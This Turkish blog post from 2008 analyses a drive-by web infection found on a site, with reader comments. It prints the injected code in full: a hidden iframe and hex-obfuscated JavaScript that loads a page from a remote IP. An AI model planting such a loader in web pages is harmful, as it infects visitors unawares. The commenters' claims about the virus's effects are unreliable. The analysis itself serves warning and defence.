HEUR/HTML.Malware Virüsüne dikkat…

Tarih: 21 Nisan 2008 | Kategori: Güvenlik | Yazar: | 17 Yorum

Merhaba arkadaşlar bir internet sayfasında surf yaparken denk geldim… HTML kodları arasına bulaşan bu virüsü bir kısım antivirüs programları algılamıyor malesef. Şuan deneme amaçlı kulllandığım Antivir programı hemen beni uyardı. Söylediğim gibi sörf yaparken denk geldim bu uyarıya.. Öncelikle birkaç antivirüs programı ile kontrol ettim ama yakalamadılar. Sadece Antivir mi yakalıyor ? O zaman bir yanlış anlaşılma olabilir dedim.

Yanlış bir alarm olup olmadığını kontrol için hemen eplorer de sağ tıklayıp kaynağı görüntüle yaptım… HTML kodlarını yukarıdan aşağıya doğru inerken </body> </html> kodlarından sonra aşağıdaki kodlara denk geldim…

</body>
</html>
<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe> <script> function v4804105e4e5e9(v4804105e4eda0){ function v4804105e4f56f () {return 16;} return(parseInt(v4804105e4eda0,v4804105e4f56f()));}function v4804105e5050c(v4804105e50ce5){ function v4804105e524c7 () {var v4804105e52cc0=2; return v4804105e52cc0;} var v4804105e514d9='';for(v4804105e51cd1=0; v4804105e51cd1<v4804105e50ce5.length; v4804105e51cd1+=v4804105e524c7()){ v4804105e514d9+=(String.fromCharCode(v4804105e4e5e9(v4804105e50ce5.substr(v4804105e51cd1, v4804105e524c7()))));}return v4804105e514d9;} document.write(v4804105e5050c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A363930292B2733383037353537655C272077696474683D3639206865696768743D3130207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); </script>

Tabiki kodları incelemeye aldım. Gördüm ki bu kodlar sayfanın en altına bir iframe açmakta ve gizli olarak açmakta…

<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe>

Scriptide bu iframe içerisinde çalıştırıyor. Tabiki “hidden;” kodunu görmüşsünüzdür. Yani gizli olarak açmakta. Kullanıcı hiçbir şekilde fark etmiyor…

Bu iframe içersinde scripti çalıştırıyor. Script ise 77.221.133.190 ip adresine bağlanmakta.

http://77.221.133.X/.if/go.html?[random_nr]

Scrip çalıştığında bu hale geliyor…

İp adresini sorguladığımda ise

Results:
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use the “-B” flag.

% Information related to ’77.221.128.0 – 77.221.143.255′

inetnum: 77.221.128.0 – 77.221.143.255
netname: DATAPOINT-NET2
descr: Colocation and virtual hosting
descr: For abuse, spam an other comliants mailto:abuse@infobox.ru
country: RU
admin-c: IBA-RIPE
tech-c: IBA-RIPE
status: ASSIGNED PA
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

person: Infobox Abuse Manager
address: 29, Viborgskaya nab.,
address: 198215 Saint Petersburg, Russia
e-mail: abuse@infobox.ru
phone: +7 812 3312999
nic-hdl: IBA-RIPE
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

% Information related to ’77.221.128.0/19AS30968′

route: 77.221.128.0/19
descr: DATACENTER2
origin: AS30968
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

Rusyada bir datacenter karşıma çıkıyor. Aman dikkat işin içerisinde RUSLAR varsa dikkat etmek lazım:)

Script çalıştığında çıkan sonuç..

<iframe src=”http://77.221.133.X/.dif/go.php?sid=1″ style=”border:0px solid gray;” WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Tavsiyem bu virüsü yakalayabilen bir anti-virüs programı ile sisteminiizi taratmanızdır. Birdefender ve Antivir bizzat denedim yakalayabiliyor.. Çok tehlikeli bir virüs değil.Tam olarakda sistemde yani windows’ta ne yapıyor bilmiyorum. Bunuda biraz araştıracağım. Tabi öncelikle kendi sistemime bulaştırdığım bu virüsü kaldıracağım sonrada site sahibini uyaracağım. Eminim farkında bile değildir….

SONUÇ :

En iyi virüs programı yoktur…

Birçok program iyidir fakat en iyisi diye bir belirleme yapamayız.

Bazıları anti-virüslerde iyidir trojanlarda zayıf bazıları trojanlarda çok iyidir fakat virüslerde zayıf bazılarıda güvenlik duvarında iyidir fakat diğer yönleri zayıf olabilir…

Pin It
Etiketler: , , , , , , , ,
Yönetici Notu

Lütfen yapacağınız yorumlarda kişi ve kurumlara hakaret etmeden, kişilik haklarına zarar vermeden görüşlerinizi bildiriniz. Oluşabilecek zararlarda ve gözden kaçabilecek durumlarda tüm sorumluluk yorumu yapan kişiye aittir. Gizlilik sayfamızda bu bilgiler açıkça belirtilmiştir.

17 Yorum Yapıldı:

Yeni Yorumlar
  1. yucell83 05 Temmuz 2008

    kardes virus bende de cıkıyo ama bi turlu oldugu dosyayı bulamadım bilgisayarda ve antivir kullanıyom ama siliorum tekrar geliyor ne yapmam lazım yardım

  2. TEAkolik 11 Temmuz 2008

    yucell83;

    Hangi internet sayfasından bu virüsü kaptıysan bir daha girme..

  3. soner 20 Temmuz 2008

    arkadaşlar kayseride int. kafe işleticisiyim. 2 gündür benimde başımda bu sorun ve bütün makinelerim haşat. 5-10 dakkaya bi kafedeki pc lerden birkaçı kitleniyor ve kitlenince diğerleride netten düşüyor resetleyince düzeliyor ama yine yapıyor bi müddet sonra. ana makinemde antivir bu virüsü buluyor fakat silmiyor. ana makinemde aynı şekilde kitleniyor.

  4. AyhanBey 18 Eylül 2008

    Bende az önce tarattım ve daha önce görmediğim HEUR/HTML.malware virüsüne rastladım fakat antiVir yakaladığı halde silmiyor , ancak ŞÜPHELİ bölümüne atıyor :S silmek için ne napmak lazım bilgilendirirseniz sevinirim veya PC ye ne gibi zararı dokunur….????

  5. ZiGoR48 21 Ekim 2008

    ARkadaşlar bende karşılaştım bu wirüsle ama antivir kullanıyorum sadece siteden gelirken engelliyor aslında hiç bir siteden gelmiyor bu internet explorer e yapışıyor we sayfaları acarken oda sitesine gidip wirüs cekiyor we genelde tempde saklıyor jawascirp kodları ilede windowsu sıkıyor ram bi anda tawan yapıyor pc nin yawaşlamasıda bu yüzden antivir orjinaller belki silebilir bunu personeller su anda engelliyor…

  6. yasin 03 Ocak 2009

    Merhaba arkadaşlar. Bende de bu virüs var. Bu virüs bir oyundan geldi. Virüsü siliyorum fakat bilgisayarı kapatıp açınca tekrar geliyor. Dosyaları tempe saklıyor fakat kaynağını bulamadım. Bir de Antivir’in çalışmamasını sağlıyor ve bazı programların exesini siliyor. Ne yapmam lazım bir yardımmm…

  7. TURHAN 18 Mart 2009

    siliyorum gene geliyor. Ne yapacağız?

  8. Erkan Nebi 06 Nisan 2009

    Bu virus ne yapıyor biliyor musunuz arkadaşlar ?

    en önemli zararı bilgisayarın ses sistemini bozuyor sonra kamera yı.
    bazı bilgisayarları kitliyor ama en önemli zararı ses e.

  9. servet 18 Temmuz 2009

    kaspersky ile temzletn bişey kalmaz ben öle yaptm ama en az 4-5 saat

  10. arda 12 Eylül 2009

    bu haylaz bendede var kaspersky ile siliyorum ama daha sonra yeniden çikiyor
    kaynağı bulup yok etmek gerek sonuca varamiyoruz bir parçasini c:/ nin içine atiyor (khwx.exe) sanırım tıklanmasını istiyor olabilir system yedek klasörünede yedeğini aliyor sistemi geri yüklersen diye
    davetçiyi bulmak gerek

Yeni Yazılar

Yorum Gönder